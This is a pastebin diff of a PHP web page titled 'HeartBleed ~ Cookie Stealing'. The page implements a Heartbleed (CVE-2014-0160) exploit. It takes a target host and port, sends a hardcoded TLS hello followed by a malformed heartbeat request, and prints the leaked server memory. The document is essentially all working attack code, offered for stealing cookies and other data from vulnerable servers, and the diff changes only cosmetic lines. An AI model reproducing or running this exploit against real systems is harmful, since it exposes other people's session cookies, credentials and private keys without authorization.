SHOW:
|
|
- or go back to the newest paste.
1 | <!DOCTYPE HTML> | |
2 | <html> | |
3 | <head> | |
4 | <meta http-equiv="content-type" content="text/html" /> | |
5 | - | <meta name="author" content="ExploreCrew" /> |
5 | + | <title>HeartBleed ~ Cookie Stealing</title> |
6 | - | <title>Heartbeat ~ Cookie Stealing</title> |
6 | + | |
7 | <!-- | |
8 | h1,p{margin: 3px;padding: 3px;} | |
9 | form,pre{width: 75%;border: 1px solid #ddd; margin: auto;padding: 3px;} | |
10 | input[type='text']{width: 90%; margin: 13px;padding: 3px;} | |
11 | input[type='submit']{padding: 10px; margin: 13px;} | |
12 | --> | |
13 | </style> | |
14 | </head> | |
15 | <body> | |
16 | <form action="" method="post" enctype="multipart/form-data"> | |
17 | <h1>HeartBleed ~ CVE-2014-0160</h1> | |
18 | - | <h1>Heartbeat ~ CVE-2014-0160</h1> |
18 | + | |
19 | <input type="text" name="host" placeholder="example.com" /> | |
20 | <input type="text" name="port" value="443" placeholder="443"/> | |
21 | <input type="submit" name="submit" /> | |
22 | </form> | |
23 | <br /> | |
24 | ||
25 | <pre> | |
26 | <?php | |
27 | ||
28 | if(isset($_POST['submit'])) { | |
29 | ||
30 | $hello = "16 03 02 00 dc 01 00 00 d8 03 02 53 | |
31 | 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf | |
32 | bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 | |
33 | 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 | |
34 | 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c | |
35 | c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 | |
36 | c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 | |
37 | c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c | |
38 | c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 | |
39 | 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 | |
40 | 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 | |
41 | 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 | |
42 | 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 | |
43 | 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 | |
44 | 00 0f 00 01 01"; | |
45 | ||
46 | $hb = "18 03 02 00 03 01 40 00"; | |
47 | ||
48 | function hexbin($string) { | |
49 | $strz = explode(" ",str_replace(" | |
50 | "," ",$string)); | |
51 | $bin = ''; | |
52 | foreach($strz as $str) { | |
53 | $bin .= chr(hexdec($str)); | |
54 | } | |
55 | return $bin; | |
56 | } | |
57 | ||
58 | $fp = fsockopen($_POST['host'],$_POST['port'],$errno,$errstr,30); | |
59 | if(!$fp) { | |
60 | echo $errstr; | |
61 | } else { | |
62 | echo "Connecting... | |
63 | "; | |
64 | ||
65 | echo "Hello SSL | |
66 | "; | |
67 | fwrite($fp,hexbin($hello)); | |
68 | ||
69 | $is_hello = true; | |
70 | $is_hb = false; | |
71 | while(!feof($fp)) { | |
72 | if($is_hello == true) { | |
73 | $buffer = fgets($fp,4096); | |
74 | $is_hello = false; | |
75 | } else { | |
76 | $buffer = fgets($fp,1024); | |
77 | if($is_hb == false) { | |
78 | echo "Sending heartbeat request... | |
79 | "; | |
80 | fwrite($fp,hexbin($hb)); | |
81 | $is_hb == true; | |
82 | } | |
83 | } | |
84 | echo $buffer; | |
85 | } | |
86 | fclose($fp); | |
87 | } | |
88 | } | |
89 | ||
90 | ?> | |
91 | </pre> | |
92 | </body> | |
93 | </html> |